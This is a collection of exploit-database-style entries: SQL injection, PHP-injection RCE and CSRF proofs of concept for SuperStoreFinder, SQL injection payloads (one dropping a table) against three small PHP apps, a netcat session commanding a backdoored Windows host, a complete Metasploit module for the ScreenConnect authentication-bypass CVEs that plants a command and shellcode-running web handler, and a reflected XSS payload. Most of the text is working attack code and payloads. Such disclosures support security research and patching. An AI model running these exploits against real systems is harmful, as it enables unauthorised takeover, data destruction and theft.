<pre><code>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br /> .:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities<br /><br />.:. Google Dorks .:.<br />"designed and built by Joe Iz."<br />"Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."<br />inurl:/superstorefinder/index.php<br /><br />.:. Date: 0ctober 13, 2023<br />.:. Exploit Author: bRpsd<br />.:. Contact: cy[at]live.no<br />.:. Vendor -> https://www.superstorefinder.net/<br />.:. Product -> https://codecanyon.net/item/super-store-finder/3630922<br />.:. Product Version -> [3.7 and below]<br />.:. DBMS -> MySQL<br />.:. Tested on > macOS [*nix Darwin Kernel], on local xampp<br />@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br /><br /><br /> #############<br /> |DESCRIPTION|<br /> #############<br />"Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations"<br /><br /><br /><br /><br /><br /><br />Vulnerability 1: Unauthenticated SQL Injection<br />Types: boolean-based blind,error-based, time-based blind<br />File: localhost/admin/index.php<br />Vul Parameter: USERNAME [POST]<br /><br />===========================================================================================<br />Vulnerability 1: Unauthenticated SQL Injection<br />Types: boolean-based blind,error-based, time-based blind<br />File: localhost/admin/index.php<br />Vul Parameter: USERNAME [POST]<br /><br /><br /><br />Test #1<br /><br />http://localhost:9000/adminstorefinder/admin/index.php<br /><br />username=a'&password=1&btn_login=Login<br /><br />Response Error:<br />Array<br />(<br /> [0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1<br />)<br />SELECT users.* FROM users WHERE users.username='admin''<br />===========================================================================================<br /><br />Test #2 => Payload (Proof Of Concept)<br /><br />http://localhost:9000/adminstorefinder/admin/index.php<br /><br />username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj<br />&password=1&btn_login=Login<br /><br /><br />Response Error:<br />Array<br />(<br /> [0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist<br />)<br />===========================================================================================<br /><br /><br /><br />======================================================================================================================================================================================<br />Vulnerability 2: Authenticated PHP Injection - Remote Code Exectuion<br />File: localhost/admin/settings.php<br />Vul Parameter: language_set [POST]<br /><br /><br />Proof of concept:<br />http://localhost:9000/superstorefinder/admin/settings.php<br />langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1<br /><br /><br />Index.php included in the config.inc.php , we just can go for rce<br />with GET parameter ?cmd=<br /><br /><br />http://localhost:9000/?cmd=uname -a<br /><br />Reponse:<br />22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64<br />===========================================================================================<br /><br /><br /><br /><br />===========================================================================================<br />Vulnerability 3: Cross Site Request Forgery<br />Risk: It can lead to Privilege Escalation through adding admins or changing admin password.<br />Affected Files (1): localhost/superstorefinder/admin/users_add.php<br />Parameters: username,password,cpassword<br /><br />Proof of concept:<br /><iframe style="display:none" name="CSRF"></iframe><br /> <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF"><br /> <input name="submit_hidden" value="submit_hidden" type="hidden" /><br /> <input type='hidden' name='username' value='X'><br />       <input type='hidden' name='password' value='123'><br /> <input type='hidden' name='cpassword' value='123'><br /> <input type='hidden' value='submit'><br /> </form><br /> <script>document.getElementById("CSRF").submit()</script><br />      <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe><br /><br /><br /><br /><br />Affected Files (2:):localhost/superstorefinder/admin/change_password.php<br />Parameters: password,cpassword,save<br /><br />Proof of concept:<br /><iframe style="display:none" name="CSRF"></iframe><br /> <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF"><br /> <input type='hidden' name='password' value='123'><br />       <input type='hidden' name='cpassword' value='123'><br /> <input type='hidden' name="save=" value='save'><br /> </form><br /> <script>document.getElementById("CSRF").submit()</script><br />      <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe><br /> ======================================================================================<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Simple Inventory Management System - SQL Injection<br /># Google Dork: N/A<br /># Application: Simple Inventory Management System<br /># Date: 26.02.2024<br /># Bugs: SQL Injection <br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver <br /># CVE : N/A<br /><br /><br />## Vulnerability Description:<br /><br />This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.<br /><br /><br />## Proof of Concept (PoC):<br /><br />An example attacker could input the following values:<br /><br />email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'<br />pwd: test<br /><br />This would result in the following SQL query:<br /><br />SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'<br /><br />This attack would retrieve all users, making the login process always successful.<br /><br />request-response foto:https://i.imgur.com/slkzYJt.png<br /><br /><br />## Vulnerable code section:<br />====================================================<br />ims/login.php<br /><br /><?php <br />ob_start();<br />session_start();<br />include('inc/header.php');<br />$loginError = '';<br />if (!empty($_POST['email']) && !empty($_POST['pwd'])) {<br /> include 'Inventory.php';<br /> $inventory = new Inventory();<br /><br /> // Vulnerable code<br /> $login = $inventory->login($_POST['email'], $_POST['pwd']); <br /> //<br /><br />if(!empty($login)) {<br /> $_SESSION['userid'] = $login[0]['userid'];<br /> $_SESSION['name'] = $login[0]['name']; <br /> header("Location:index.php");<br /> } else {<br /> $loginError = "Invalid email or password!";<br /> }<br />}<br />?><br /><br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Flashcard Quiz App - SQL Injection<br /># Google Dork: N/A<br /># Application: Flashcard Quiz App<br /># Date: 25.02.2024<br /># Bugs: SQL Injection <br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver <br /># CVE : N/A<br /><br /><br />## Vulnerability Description:<br /><br />The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.<br /><br /><br />## Proof of Concept (PoC):<br /><br />This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.<br /><br />1. Original Code:<br /><br />$card = $_GET['card'];<br /><br />$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";<br /><br />2. Payload:<br /><br />' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --<br /><br />3. Injected Query:<br /><br />DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --<br /><br />Request Response foto: https://i.imgur.com/5IXvpiZ.png<br /><br /><br />## Vulnerable code section:<br />====================================================<br />endpoint/delete-flashcard.php<br /><br />$card = $_GET['card'];<br /><br />$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";<br /><br /></code></pre>
<pre><code># Exploit Title: FAQ Management System - SQL Injection<br /># Google Dork: N/A<br /># Application: FAQ Management System<br /># Date: 25.02.2024<br /># Bugs: SQL Injection <br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver <br /># CVE : N/A<br /><br /><br />## Vulnerability Description:<br /><br />The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.<br /><br /><br />## Proof of Concept (PoC):<br /><br />An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:<br /><br />1. Original Request:<br />http://example.com/endpoint/delete-faq.php?faq=123<br /><br />2.Malicious Request (SQL Injection):<br />http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --<br /><br />This would result in a query like:<br /><br />DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --<br /><br />Which can lead to the deletion of data or even the entire table.<br /><br /><br />poc foto: https://i.imgur.com/1IENYFg.png<br /><br /><br />## Vulnerable code section:<br />====================================================<br />endpoint/delete-faq.php<br /><br /><br />$faq = $_GET['faq'];<br /><br />// ...<br /><br />$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/b012704cad2bae6edbd23135394b9127.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.AutoSpy.10<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 1008. Third party adversaries who can reach an infected host can issue various commands made available by the backdoor. Command "startapp" will run programs, "msgbox" will send a popup box to message the victim. The "hangup victim" cmd will cause infinite notepad.exe processes to open on the affected machine. Other commands avail are "info tick" which returns system information, "kill" [file] etc.<br />Family: AutoSpy<br />Type: PE32<br />MD5: b012704cad2bae6edbd23135394b9127<br />Vuln ID: MVID-2024-0671<br />Disclosure: 02/24/2024<br /><br />Exploit/PoC:<br />C:\sec>nc64.exe x.x.x.x 1008<br />startapp "c:\Windows\System32\mspaint.exe"<br />Application started...<br />startapp "c:\Windows\System32\calc.exe"<br />Application started...<br />msgbox hate<br />Messagebox shown...<br />info tick<br />Product Name :<br />Product ID :<br />Product Type :<br />User Organization :<br />User Name :<br />System Root :<br />Version :<br />Version Number :<br />Sub Version Number :<br />Computer Name : DESKTOP-2C4IJHO<br />Time Zone : @tzres.dll,-112<br />Network Logon :<br />beep Beep<br />Beep send...<br />hangup victim<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'ConnectWise ScreenConnect Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create<br /> a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage<br /> this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7<br /> and below are affected.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # MSF RCE Exploit<br /> 'WatchTowr', # Auth Bypass PoC<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-1708'], # Path traversal when extracting zip file.<br /> ['CVE', '2024-1709'], # Auth bypass to create admin account.<br /> ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory<br /> ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], # Auth Bypass PoC<br /> ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] # Analysis of both CVEs<br /> ],<br /> 'DisclosureDate' => '2024-02-19',<br /> 'Platform' => %w[win linux unix],<br /> 'Arch' => [ARCH_X64, ARCH_CMD],<br /> 'Privileged' => true, # 'NT AUTHORITY\SYSTEM' on Windows, root on Linux.<br /> 'Targets' => [<br /> [<br /> # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:<br /> # windows/x64/meterpreter/reverse_tcp<br /> 'Windows In-Memory', {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_X64<br /> }<br /> ],<br /> [<br /> # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:<br /> # cmd/windows/http/x64/meterpreter/reverse_tcp<br /> 'Windows Command', {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => {<br /> 'FETCH_COMMAND' => 'CURL',<br /> 'FETCH_WRITABLE_DIR' => '%TEMP%'<br /> }<br /> }<br /> ],<br /> [<br /> # Tested ScreenConnect 20.3.31734 on Ubuntu 18.04.6 with payloads:<br /> # cmd/linux/http/x64/meterpreter/reverse_tcp<br /> # cmd/unix/reverse_bash<br /> 'Linux Command', {<br /> 'Platform' => %w[linux unix],<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => {<br /> 'FETCH_COMMAND' => 'WGET',<br /> 'FETCH_WRITABLE_DIR' => '/tmp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8040,<br /> 'SSL' => false,<br /> 'EXITFUNC' => 'thread'<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> CONFIG_CHANGES,<br /> # The existing administrator account will be replaced<br /> ACCOUNT_LOCKOUTS<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alpha_lower(8)]),<br /> OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(16)])<br /> ])<br /> end<br /><br /> def check<br /> # This is a file found on the recent 23.9.7.8804 (Circa 2024), an out of support 20.3.31734 (Circa 2021), and<br /> # a very old 2.5.3409.4645 (Circa 2012). So we can expect this file to exist on all targets. As this endpoint<br /> # expects authentication, the response will be a 302 redirect to the Login page. As Windows is case insensitive<br /> # we can request 'Host.aspx' with any case and get the expected 302 response, however Linux is case sensitive and<br /> # will always 404 a request to 'Host.aspx' if we jumble up the case. Both a 302 and 404 response will still include<br /> # the Server header, which we use to confirm both ScreenConnect and the version number.<br /> host_aspx = 'Host.aspx'<br /><br /> host_aspx = loop do<br /> jumblecase_host_aspx = host_aspx.chars.map { |c| rand(2) == 0 ? c.upcase : c.downcase }.join<br /> break jumblecase_host_aspx unless jumblecase_host_aspx == host_aspx<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, host_aspx)<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 302 || res.code == 404<br /><br /> platform = res.code == 302 ? 'Windows' : 'Linux'<br /><br /> if res.headers.key?('Server') && (res.headers['Server'] =~ %r{ScreenConnect/(\d+\.\d+.\d+)})<br /><br /> detected = "ConnectWise ScreenConnect #{Regexp.last_match(1)} running on #{platform}."<br /><br /> if Rex::Version.new(Regexp.last_match(1)) <= Rex::Version.new('23.9.7')<br /> return CheckCode::Appears(detected)<br /> end<br /><br /> return CheckCode::Safe(detected)<br /> end<br /><br /> CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> # Sanity check the USERNAME and PASSWORD will meet the servers password requirements.<br /> fail_with(Failure::BadConfig, 'USERNAME must not be empty.') if datastore['USERNAME'].empty?<br /> fail_with(Failure::BadConfig, 'PASSWORD must be 8 characters of more.') if datastore['PASSWORD'].length < 8<br /><br /> #<br /> # 1. Begin the setup wizard using the vulnerability to access the SetupWizard.aspx page.<br /> #<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/')<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply when initiating setup wizard.')<br /> end<br /><br /> viewstate, viewstategen = get_viewstate(res)<br /> unless viewstate && viewstategen<br /> fail_with(Failure::UnexpectedReply, 'Did not locate the view state after initiating setup wizard.')<br /> end<br /><br /> #<br /> # 2. Advance to the next step in the setup.<br /> #<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),<br /> 'vars_post' => {<br /> '__EVENTTARGET' => '',<br /> '__EVENTARGUMENT' => '',<br /> '__VIEWSTATE' => viewstate,<br /> '__VIEWSTATEGENERATOR' => viewstategen,<br /> 'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from first step in setup wizard.')<br /> end<br /><br /> viewstate, viewstategen = get_viewstate(res)<br /> unless viewstate && viewstategen<br /> fail_with(Failure::UnexpectedReply, 'Did not locate the view after first step in setup wizard.')<br /> end<br /><br /> #<br /> # 3. Create a new administrator account.<br /> #<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),<br /> 'vars_post' => {<br /> '__EVENTTARGET' => '',<br /> '__EVENTARGUMENT' => '',<br /> '__VIEWSTATE' => viewstate,<br /> '__VIEWSTATEGENERATOR' => viewstategen,<br /> 'ctl00$Main$wizard$userNameBox' => datastore['USERNAME'],<br /> 'ctl00$Main$wizard$emailBox' => Faker::Internet.email(name: datastore['USERNAME']).to_s,<br /> 'ctl00$Main$wizard$passwordBox' => datastore['PASSWORD'],<br /> 'ctl00$Main$wizard$verifyPasswordBox' => datastore['PASSWORD'],<br /> 'ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton' => 'Next'<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from create account step in setup wizard.')<br /> end<br /><br /> print_status("Created account: #{datastore['USERNAME']}:#{datastore['PASSWORD']} (Note: This account will not be deleted by the module)")<br /><br /> #<br /> # 4. Log in with this account to get an authenticated HTTP session.<br /> #<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'Administration'),<br /> 'keep_cookies' => true,<br /> 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to login with admin credentials.')<br /> end<br /><br /> if res.body =~ %r{"antiForgeryToken"\s*:\s*"([a-zA-Z0-9+/=]+)"}<br /> anti_forgery_token = Regexp.last_match(1)<br /> else<br /> # The antiForgeryToken is not present in older versions of ScreenConnect (Tested with 20.3.31734).<br /> print_warning('Could not locate anti forgery token after login with admin credentials.')<br /> anti_forgery_token = ''<br /> end<br /><br /> #<br /> # 5. Create an extension to host the payload.<br /> #<br /><br /> # NOTE: Rex::Text.rand_guid return a GUID string wrapped in curly braces which is not what we want, so we use<br /> # Faker::Internet.uuid instead.<br /> plugin_guid = Faker::Internet.uuid<br /><br /> payload_ashx = "#{Rex::Text.rand_text_alpha_lower(8)}.ashx"<br /><br /> # According to Microsoft (https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/keywords/) these are<br /> # the list of valid C# keywords, we create a Rex::RandomIdentifier::Generator to generate new identifiera for<br /> # use in the ASHX payload, and pass the list of valid C# keywords as a forbidden list so we dont accidentaly<br /> # generate a valid keyword.<br /> vars = Rex::RandomIdentifier::Generator.new({<br /> forbidden: %w[<br /> abstract add alias and args as ascending async await<br /> base bool break by byte case catch char checked class const continue decimal default delegate descending do<br /> double dynamic else enum equals event explicit extern false file finally fixed float for foreach from get<br /> global goto group if implicit in init int interface internal into is join let lock long managed nameof<br /> namespace new nint not notnull nuint null object on operator or orderby out override params partial private<br /> protected public readonly record ref remove required return sbyte scoped sealed select set short sizeof<br /> stackalloc static string struct switch this throw true try typeof uint ulong unchecked unmanaged unsafe ushort<br /> using value var virtual void volatile when where while with yield<br /> ]<br /> })<br /><br /> if target['Arch'] == ARCH_CMD<br /> payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %><br />using System;<br />using System.Web;<br />using System.Diagnostics;<br /><br />public class #{vars[:var_handler_class]} : IHttpHandler<br />{<br /> public void ProcessRequest(HttpContext #{vars[:var_ctx]})<br /> {<br /> if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {<br /> return;<br /> }<br /><br /> byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);<br /><br /> string #{vars[:var_payload]} = System.Text.Encoding.UTF8.GetString(#{vars[:var_bytearray]});<br /><br /> ProcessStartInfo #{vars[:var_psi]} = new ProcessStartInfo();<br /><br /> #{vars[:var_psi]}.FileName = "#{target['Platform'] == 'win' ? 'cmd.exe' : '/bin/sh'}";<br /><br /> #{vars[:var_psi]}.Arguments = "#{target['Platform'] == 'win' ? '/c' : '-c'} \\\"" + #{vars[:var_payload]} + "\\\"";<br /><br /> #{vars[:var_psi]}.RedirectStandardOutput = true;<br /><br /> #{vars[:var_psi]}.UseShellExecute = false;<br /><br /> Process.Start(#{vars[:var_psi]});<br /> }<br /><br /> public bool IsReusable { get { return true; } }<br />})<br /> else<br /> payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %><br />using System;<br />using System.Web;<br />using System.Diagnostics;<br />using System.Runtime.InteropServices;<br /><br />public class #{vars[:var_handler_class]} : IHttpHandler<br />{<br /> [System.Runtime.InteropServices.DllImport("kernel32")]<br /> private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);<br /><br /> [System.Runtime.InteropServices.DllImport("kernel32")]<br /> private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);<br /><br /> public void ProcessRequest(HttpContext #{vars[:var_ctx]})<br /> {<br /> if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {<br /> return;<br /> }<br /><br /> byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);<br /><br /> IntPtr #{vars[:var_func_addr]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{vars[:var_bytearray]}.Length, 0x3000, (IntPtr)0x40);<br /><br /> Marshal.Copy(#{vars[:var_bytearray]}, 0, #{vars[:var_func_addr]}, #{vars[:var_bytearray]}.Length);<br /><br /> IntPtr #{vars[:var_thread_id]} = IntPtr.Zero;<br /><br /> CreateThread(IntPtr.Zero, UIntPtr.Zero, #{vars[:var_func_addr]}, IntPtr.Zero, 0, ref #{vars[:var_thread_id]});<br /> }<br /><br /> public bool IsReusable { get { return true; } }<br />})<br /> end<br /><br /> manifest_data = %(<?xml version="1.0" encoding="utf-8"?><br /><ExtensionManifest><br /> <Version>#{Faker::App.version}</Version><br /> <Name>#{Faker::App.name}</Name><br /> <Author>#{Faker::Name.name}</Author><br /> <ShortDescription>#{Faker::Lorem.sentence}</ShortDescription><br /> <Components><br /> <WebServiceReference SourceFile="#{payload_ashx}"/><br /> </Components><br /></ExtensionManifest>)<br /><br /> zip_resources = Rex::Zip::Archive.new<br /> zip_resources.add_file("#{plugin_guid}/Manifest.xml", manifest_data)<br /> # We can leverage CVE-2024-1708 to write one level below the extension directory. This enable Linux targets to work.<br /> zip_resources.add_file("#{plugin_guid}/../#{payload_ashx}", payload_data)<br /><br /> #<br /> # 6. Upload the payload extension.<br /> #<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'InstallExtension'),<br /> 'keep_cookies' => true,<br /> 'ctype' => 'application/json',<br /> 'data' => "[\"#{Base64.strict_encode64(zip_resources.pack)}\"]",<br /> 'headers' => {<br /> 'X-Anti-Forgery-Token' => anti_forgery_token<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to install extension.')<br /> end<br /><br /> print_status("Uploaded Extension: #{plugin_guid}")<br /><br /> if target['Platform'] == 'win'<br /> # On Windows the current working directory is C:\Windows\System32\ and we dont leak out the install path<br /> # so we use the default installation location...<br /> register_files_for_cleanup("C:\\Program Files (x86)\\ScreenConnect\\App_Extensions\\#{payload_ashx}")<br /> else<br /> # For Linux the current working is the install path (/opt/screenconnect) so we can use a relative path...<br /> register_files_for_cleanup("App_Extensions/#{payload_ashx}")<br /> end<br /><br /> begin<br /> #<br /> # 7. Trigger the payload by requesting the extensions .ashx file.<br /> #<br /> if target['Arch'] == ARCH_CMD<br /> payload_data = payload.encoded.gsub('\\', '\\\\\\\\')<br /> else<br /> payload_data = payload.encoded<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'App_Extensions', payload_ashx),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> vars[:var_payload_key] => Base64.strict_encode64(payload_data)<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to trigger payload.')<br /> end<br /> ensure<br /> #<br /> # 8. Ensure we remove the extension when we are done.<br /> #<br /> print_status("Removing Extension: #{plugin_guid}")<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'UninstallExtension'),<br /> 'keep_cookies' => true,<br /> 'ctype' => 'application/json',<br /> 'data' => "[\"#{plugin_guid}\"]",<br /> 'headers' => {<br /> 'X-Anti-Forgery-Token' => anti_forgery_token<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> print_warning('Failed to remove the extension.')<br /> end<br /> end<br /> end<br /><br /> def get_viewstate(res)<br /> vs_input = res.get_html_document.at('input[name="__VIEWSTATE"]')<br /> unless vs_input&.key? 'value'<br /> print_error('Did not locate the __VIEWSTATE.')<br /> return nil<br /> end<br /><br /> vsgen_input = res.get_html_document.at('input[name="__VIEWSTATEGENERATOR"]')<br /> unless vsgen_input&.key? 'value'<br /> # The __VIEWSTATEGENERATOR is not present in older versions of ScreenConnect (Tested with 20.3.31734).<br /> print_warning('Did not locate the __VIEWSTATEGENERATOR.')<br /> return [vs_input['value'], '']<br /> end<br /><br /> [vs_input['value'], vsgen_input['value']]<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: SuperCali Version : 1.1.0 - Reflected XSS<br /># Date: 2024-23-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://supercali.inforest.com<br /># Version : 1.1.0<br /># Tested on: https://softaculous.com/demos/supercali<br /><br /><br />1 ) Go to admin login url : https://127.0.0.1/SuperCali/login.php<br />2 ) Write your payload admin place : "><img src=x onerrora=confirm() onerror=confirm(1)><br />3 ) AFter click login will you see alert button : https://127.0.0.1/SuperCali/bad_password.php?email=\%22%3E%3Cimg%20src=x%20onerrora=confirm()%20onerror=confirm(1)%3E&return_to=127.0.0.1/&o=4&c=1&m=02&a=22&y=2024&w=1<br /></code></pre>
